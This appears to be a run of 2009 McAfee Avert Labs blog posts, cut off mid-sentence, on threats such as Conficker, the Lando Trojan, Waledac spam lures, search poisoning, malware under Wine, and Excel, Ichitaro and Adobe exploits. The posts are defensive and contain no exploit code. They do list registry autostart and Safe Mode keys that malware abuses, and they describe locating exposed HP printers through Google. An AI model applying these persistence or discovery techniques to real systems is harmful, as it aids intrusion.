To prepare for any trouble on April 1, McAfee now offers a special build of its standalone cleaning tool Stinger, which will be updated on a daily basis to include any undetected Conficker variants from the wild. This special build of Stinger can be downloaded from the Avert Tools site. We’ve also posted detailed documentation on mitigation steps that security staff within organizations can take to combat W32/Conficker. Additional McAfee product coverage information for MS08-067–the Microsoft Windows Server Service vulnerability, which is exploited by the worm–can be viewed at the McAfee Threat Center.

Please ensure that your copy of Microsoft Windows is patched and your security software is fully up to date. That way you won’t end up an April Fool.

You already know that malware changes registry keys to take advantage of the autorun capability when systems and applications start. The registry keys we often see for this purpose include:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\Current Version\Windows\AppInit_DLLs
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\[Legit_program]\Debugger
HKEY_CLASSES_ROOT\CLSID\[CLSID]\InprocServer32

Recently, we noticed that the Lando Trojan uses a different registry to load its malicious code into Internet Explorer. By dropping a fake sound driver (wdmaud.sys) into the %system32% folder and by adding the registry key HKEY_LOCAL_MACHINE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux2: “%system32%\wdmaud.sys,” the malware author injects malicious code into the iexplore.exe process. When the user launches Internet Explorer, the attacker hijacks Google search.

How can you distinguish the real sound driver from the fake? The legitimate wdmaud.sys is a component of Microsoft’s WDM driver or WINMM WDM Audio Compatibility driver. You’ll find it in the %system32%\drivers\ folder. It is about 84KB and includes complete version information.

Meanwhile the malicious wdmaud.sys is located in the %system32%\system32 folder. It is only about 22KB and has no version information.

By comparing their file properties, you can easily tell the difference. But, as always, be careful when deleting the malicious wdmaud.sys or other suspicious files. You don’t want to trash the legitimate driver.

When I wrote a scanner plug-in this week for an old directory traversal vulnerability–CVE-2008-4419–I wondered whether there are vulnerable HP LaserJet printers online that can be controlled from the Internet. To find out, I used Google. The search listed almost 50 results, and I found that almost all of these printers are not patched, even though HP has provided firmware updates to resolve this vulnerability. An attacker could leverage this unicode-encoded directory traversal vulnerability to read configuration files or cached documents, and gain read access from the Internet to important internal information.

Usually administrators ignore the security of printer devices. They may think there is no harm even if the printer can be controlled remotely by an attacker.

The administration web interface of these LaserJets can be accessed without passwords. The attacker can use these LaserJets to print any documents from anywhere. Although attackers may not be able to reach the printouts, at least they can waste a lot of paper. Spammers can also post free advertising to companies if they connect to these printers.

So please harden your network gateway or firewall to restrict access to these devices. Don’t give everyone on the Internet a chance to use your printer, and patch the vulnerable LaserJets to prevent the potential information disclosure.

To download the HP firmware updates and upgrade instructions, click here.

McAfee Avert Labs will now produce more detailed documentation on prevalent threat families. The “Combating Threats” document series is designed to arm security staff within organizations with more information concerning prevalent threat families as well as to provide additional mitigation steps that can be taken. The first two documents in this series, “W32/Virut Family” and “Finding W32/Conficker.worm,” are now available via our blog, prior to our “Combating Threats” web page going live.

UPDATE MARCH 17th

Apologies for the busted links yesterday. All seem to be resolving fine now.

For years, the Japanese word processor Ichitaro has been attacked by malware authors exploiting flaws in the application. So it is no surprise that in the last week we discovered in the wild specially crafted Ichitaro document files exploiting a new vulnerability.

This time, the crafted file (detected as the Exploit-TaroDrop.g Trojan) drops and runs the Generic Dropper Trojan, which is responsible for dropping the BackDoor-DNW Trojan. The last attempts to connect “lightsut.com:80” and opens a backdoor to give attackers remote access to compromised machines. McAfee proactively detects Generic Dropper, which prevents users from being infected with BackDoor-DNW even with a non-patched copy of Ichitaro.

Detection alert of Japanese McAfee VirusScan Enterprise

The patch for this vulnerability has already been published by JustSystem. Ichitaro users should apply the update as soon as possible.

Users should always take care while surfing the Internet and reading mail, and today maybe more than usual: Another spam run from the Waledac botnet is on the loose, this time misusing the good reputation of the news agency Reuters. After the “President Inauguration,” “Valentine Scam,” and the “Economic Crisis,” this time the social-engineering trick is a “Terror Attack” in your city. Mails with subjects such as “Why did they explode bomb there?” or “Why did it happen in your city?” are being sent out by the botnet right now.

Again the bad guys are using geolocation services to better target their audience. As described in my earlier blog, they are using the city name of the user visiting the fake website and inserting this name into the website itself. So the “breaking news” gets even more attention, because when an attack happens in your home town, everyone would be anxious and curious, right? The screenshot below is an example what a user from New York would see; other users would see the same message but with their local city being “attacked”:

The website claims that a “dirty bomb” exploded in the user’s city and that at least 12 people have been killed. A video from Reuters is presented but “You need the latest Flash player to view video content. Click here to download.” It’s another example of the time-worn missing-codec trick. The needed “update” named main.exe or save.exe is in fact the real malware.

The fast-fluxing website also includes a malicious IFRAME that refers to malicious code trying to exploit unpatched computers with an additional drive-by infection.

The Waledac/Storm authors try to keep their botnet running and always craft new social-engineering tricks to fool unsuspicious users to follow their lure. As always, the best advice is to not click links in spam mails. And the malicious IFRAME pointing to a drive-by infection is another good reminder that “curiosity killed the cat.”

Last week I blogged about how the community forum of Democrats.org was being abused to help manipulate Google’s search results; to lead people to malware.  It appeared that by the end of last week, Democrats.org began the cleanup process of removing all the bogus posts, which seems to have been completed as of this time.  Google’s cache shows that other popular sites were hit as well, including my.barackobama.com and Microsoft’s silverlight.net, which were cleaned up sometime before the end of last week.

In looking a little more at the spammed phrases, it appears as though there are likely multiple groups behind these attacks, perhaps with different agendas.   Some of this is obvious from the formatting of the spam.  The terms themselves also vary, some appear in more dictionary style, while others are more focused on current events, and others still are rather uncommon.  The uncommon terms (including typos) lead me to speculate that at least some terms originated from compromised systems.  There may be a circular nature to this, where unsuspecting victims become infected with one piece of malware, only to have their search terms harvested, analyzed, and subsequently used to entice other victims, but again this is speculation at this point.

Windows offers the useful option of “Safe Mode” to recover from any damage caused by various malfunctions in the system. Booting in Safe Mode loads limited drivers and services that are required for the basic operation of the system, but avoids adding many extras that complicate the environment. In general, Safe Mode is very helpful in recovering the system from malware infections. However, malware can exploit this feature by loading in Safe Mode, thus creating great difficulties for users and administrators in recovering from these infections.

The services and drivers that load in Safe Mode are listed under the following registry key(s):

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network

If malware gains control of the system, it can add its entry under the above key(s) to load during a Safe Mode boot. This type of malware is difficult to remove manually; you’ll need an anti-virus product to detect and clean such malware.

Always practice “safe surfing,” which is the first step in keeping your computers clean, and keep your anti-virus signatures updated.

The other day I blogged about Google Trends being abused to serve malware.  The attackers were not only targeting the most popular search terms, but also manipulating Google’s page rankings to appear high up on search results.   Shortly thereafter it appeared that Google took action against that attack.  In deed a Google spokesperson confirmed that idea.

Today, Brian Krebs blogged on a separate story, but mentioned that while searching for a related term (pifts.exe), Google returned a poisoned link high on the results list.  After doing a little searching I discovered that the relevant term did seem to appear on Google’s top 100 search terms for a brief period.  However, the other terms I checked on Google Trends did not yield high ranked poisoned links as before.  But, I did come across a potential source for the page rank manipulation aspects of these attacks;  www.democrats.org, which is “Paid for by the Democratic National Committee “, and linked to from www.barackobama.com.

It turns out that this high-ranking website has a community blog feature that allows anyone to create a blog and post whatever they want.  Attackers have flooded this forum with bogus posts and thousands of links for more than a month.

Blog spam such as this is not anything new.  However, this highlights one significant effect of such spam and underlines the cause and effect relationship of security on the web.

Web searches are immensely useful and quite powerful.
Web 2.0, where a community of users contributes content for the betterment of the community can be a great thing.
But combined, a bad apple (or thousands) doesn’t just hurt the community; it can hurt a significant portion of the Web itself.

The other day I blogged about Google Trends being abused to serve malware.  The attackers were not only targeting the most popular search terms, but also manipulating Google’s page rankings to appear high up on search results.  It appears that Google may have squashed those attacks, at least at the moment.

The pages that were coming up while searching Google seem to be purged from Google’s index.  The pages may still be found on other search engines, though not ranked as high.  This is also visible in stats I started gathering yesterday.

I took the top 100 search terms for each day of this week and ran a Google search on each term.  I then considered the top 10 search results for each term, looking for poisoned links with high rankings.  Admittedly it would have been better to gather the search results on each day, rather then running the test several days after the fact, but none the less the limited results do suggest that Google took some recent actions.

The following graph shows significant activity prior to mid-day yesterday.

We can assume the attackers will be looking at new and creative ways to circumvent any countermeasures that may be in place.

Search safe.

The other day a worm, often referred to as “Error Check System” was spreading on Facebook.  In fact if you searched for information on this threat, your search results were poisoned to lead unsuspecting victims to a site that attempts to install a rogue anti-spyware Trojan.  Some folks blogged that this search connection was “too much of a coincidence“, and that the Facebook part of the threat was a “red herring“.  I do not believe this is the case, and here’s why.

Last week I was following up on a comment made to the McAfee Avert Labs blog.  The URL provided by the visitor (**********.******.bee.pl/waledac_botnet.html) redirected to another site that attempted to install the same trojan.  Running a search on part of that URL yielded hundreds of search results, many that were placed high up on Google’s results.  The summary text was relevant for the search term and it’s clear that those behind the redirects are manipulating the internet (Google); by not only getting their newly created sites to appear high on the search results page, but also to display relevant text in the page summary section, and for the hottest terms.  Here’s one example, ironically related to the recent Gmail outage.

You’ll also notice that the page summary is identical to the top search result, taken from Google News.  Looking at more search results it is clear that the attackers are targeting popular search terms.

 Other searches show the results using all lowercase titles, the same as used by Google Trends.  In fact, checking some of the top Google Trends links we can see that the abusers are hitting it (ash wednesday 2009 was the #1 search term at the time of this writing, this is image was edited to fit on the blog).

The notion of malware distributors abusing Google Trends is not new, and received some attention in October of last year.  However, I do not recall previous attacks being as aggressive as the current ones, being distributed across numerous sites, targeting many many high-profile search terms, and having the poisoned links regularly appearing high up in the result pages.

Once a user visits one of these poisoned links, the destination page references a script file (style.js), which is obfuscated.

Decoding the script shows that it redirects the user based on the referring URL being “google”,”msn”,”yahoo”,” comcast”,”aol.com”.  This is just one of the many ways the bad guys focus their attacks on potential victims, while making it a tiny bit more difficult for others to discover it.  Once you’re redirected, it’s situation normal for the attackers, various fake alert and scanning messages and windows appearing, ultimately leading to the installation of a FakeAlert trojan (such as one of the 9,500+ known binaries identified by McAfee as FakeAlert-AB).

If you made it down to the bottom of this blog, I probably don’t need to remind you to look carefully before you click, on the Web.

– Update Feb 24, 10:15 PDT –
Microsoft has released a security advisory for this issue (CVE-2009-0238):
http://www.microsoft.com/technet/security/advisory/968272.mspx

Many versions of Excel are vulnerable, including 2000, 2002, 2003, 2007, 2004/2008 for Mac, Excel Viewer/Excel Viewer 2003.
 –

A Trojan exploiting an unpatched Microsoft Excel vulnerability has been reported from the field. McAfee Avert Labs has confirmed that Microsoft Excel 2007 and 2003 are affected. Other versions may also be impacted.

McAfee DAT files identify known malicious Excel spreadsheet files as Exploit-MSExcel.r Trojan, and dropped files as BackDoor-DUE Trojan in the 5534 DATs.

As with the initial Exploit-PDF.i threat, current attacks are very targeted and limited. When succesfull, it installs a backdoor that attempts to connect a remote site port 80 and waits for commands.

The mitigation for this infection is to block unknown TCP connections. However, one of the best protection methods is to remain vigilant against Excel files from untrusted sources or sent at an unexpected time until a security update is available.

For the unaware, Wine is an application that enables users to run Windows applications on Unix-like computers. Like many users, I use Wine on my Linux machine to run a couple of Windows applications I cannot do without. I could run these applications on a virtual machine, or even dual-boot with Windows and Linux, but running them in Wine is just easier.

Although running Windows applications in Wine has its advantages, it also comes at a price: bringing Windows malware into Linux. I’m aware that it isn’t Wine’s responsibility to distinguish between a malicious and a nonmalicious file, and that Wine shouldn’t have any problem running a malicious file; however, I had this morbid curiosity to see how well today’s malware would fare running on Wine, and so began an experiment using the following setup:

• Ubuntu Linux 8.04 [comes with Gnome desktop environment]
• Wine 1.0 [run as a nonroot user with default settings]

I decided to choose samples that displayed a cocktail of malicious behavior, and so I chose the following:

File Infectors

W32/Philis is a file infector that apart from appending its code to other executables downloads and drops other malware.

This malware ran without throwing any errors in Wine. It immediately dropped files in the “Windows” and “Windows\System32″ folders and executed these dropped files. It then attempted to connect to a preconfigured site, and downloaded more malware successfully. It also began infecting executables in the Wine directory and created a registry run key for the malicious file.

The screenshot below shows the clean “CProcess.ori,” the original file 35KB in size, and “CProcess.vir,” the infected file 131KB in size.

It’s worth mentioning that the autostart registry key the file infector created will not work under Wine, so applications will not be able to autostart when the Linux machine is booted up. Also, this file infector didn’t seem to infect ELF files. But I’m guessing that a file infector that blindly appends/prepends its code to other files shouldn’t have any problem corrupting ELF files.

Autorun Malware

W32/Autorun.Worm.CP is an autorun worm, which drops autorun.inf in the root of removable drives.

This malware also ran without any errors. It dropped both the malicious files and the associated autorun.inf file in the C:\ drive and attached removable devices, and created a registry run key.

The screenshot below shows the created Autorun.inf file, along with the malicious files that were created in the root of the removable device.

The registry run key created by the malware won’t work in Wine, however. As long as the malicious file is running, any new removable devices connected to the machine will get infected, thus making a Linux machine the origin of an infection.

Although it is difficult for malware to autostart in Wine, it is not impossible. Malware can be written to find out if it is running in Wine. It can then either download a Linux binary onto the machine and/or simply add an autostart entry for itself in the Linux desktop environment’s common autostart locations, using the nonroot user’s credentials.

IRC Trojans

IRC/Contact malware drops files and connects to a preconfigured IRC server. This IRC Trojan, when ran in Wine, connected to the preconfigured IRC server. From the IRC server I was able to connect to the bot, and control it. Though the control was limited, I was still able to list the files under the Wine directory, get system information, download files to the Linux machine remotely, etc.

The screen shot below shows my logging into the infected Linux machine and issuing commands:

Click here for larger version of the image.

The screen shot below shows the infected machine responding to the “getinfo” command issued from the IRC channel:

Click here for a larger version of the image.

This IRC Trojan was very simple in features, but I’m guessing that with a complex one, an attacker shouldn’t have any problem scanning the subnet for an exploit and sending a payload to infect Windows machines.

Keyloggers/Password Stealers

Apart from this, I tried running a couple of password stealers and keyloggers, but I couldn’t find one that worked well. I’m guessing they couldn’t get a hook to the keyboard.

Although stealing information using a Windows malware in Wine is difficult, an infected Linux machine can still contribute to a DOS attack or be the origin of an infection as suggested earlier.

Scareware

This class of malware displays falsely exaggerated scan reports and tricks users into buying them. They utilize extreme social-engineering tactics combined with obfuscated Java scripts that check for exploits on the machine.

Although I didn’t run the Scareware installer in Wine, I did browse through a site that ran a JavaScript to pop up a window informing me that my “Windows” machine was infected, and requested that I install the malicious file.

Screen shots below:

Click here for a larger screen shot.

It is important to note that if the user had set the file association for Windows executables with Wine, then simply double-clicking the downloaded file would run the malware.

Mitigation Techniques

• Never run Wine applications as root.
• Wine maps the root directory, the user’s home directory, CD ROMs and removable devices found, and these mappings are listed in “~/.wine/dosdevices/”. Consider deleting these except the link to your drive_c.
• Do not set the file association for Windows executables with Wine. This would enable the running of Windows executables in Wine by simply double-clicking them.
• Administrators should think twice before installing Wine on a Linux server. These machines are seldom turned off, and so the problem that a malware faces in Wine with respect to autostarting its code when the machine boots up, I mentioned this earlier, would become void.

A new spam run is on the loose, misusing the global economic crisis as its social-engineering vector. Consumers looking for a bargain should take care, because the bad guys exactly want to fool people trying to save some money these days. Spam mails promoting bargains, which could help in the recession, are hitting the inboxes right now.

When users follow a link in such spam mails–but please don’t do that!–a website like the one below appears:

After the Valentine’s Day theme, the malware authors behind the Waledac botnet changed their lure to promote free coupons, pretending to “save” consumers a lot of money. The text states: Exclusive sale coupons and deals at over 100 000 stores in <City>, <Country>. You can find these amazing sale offers and coupons ONLY HERE! You can download free online and printable coupon list. In our list there are most popular stores, restaurants and companies in <City>, <Country> with discounts up to 95%. We help you to survive this crisis! The coupon list is named “couponslist.exe,” “sale.exe,” or “print.exe”–and, in fact, is malware.

In economically hard times, the malware authors do not rely only on clever and timely social engineering, they also include a malicious IFRAME in the website that refers to malicious code trying to exploit unpatched computers with an additional drive-by infection. Furthermore, the website is craftily designed. The bad guys are using geo-location services to better target their audience. So when someone connects to the website, it determines the geographical location on the fly and presents the actual location in the website texts. When a victim sees coupons for exactly his town, this will increase the demand for the bargain list.

As a last piece of advice we can only stress again that consumers should always take care with offers that look too good to be true–even more so in the hard times of a global economic crisis. Please also refer to our predictions for 2009 “Cybercrime, Online Threats, and the Recession.”

Needless to further remind everyone, zero-day attacks are the preferred choice of cyber criminals and will continue to be so in 2009. If the recent W32/Conficker.worm (MS08-087) and Exploit-XMLhttp.d (MS08-078, MS09-002) were not good enough to prove our point, here is another one.

At the turn of 2009, malicious PDF documents were discovered to be exploiting a 0-day vulnerability affecting Adobe Reader 8,x and 9.x. In parsing a specially crafted embedded object, a bug in the reader allowed the attacker to overwrite memory at an arbitrary location. The attacks, found in the field, use the infamous “HeapSpray” method via JavaScript to achieve control of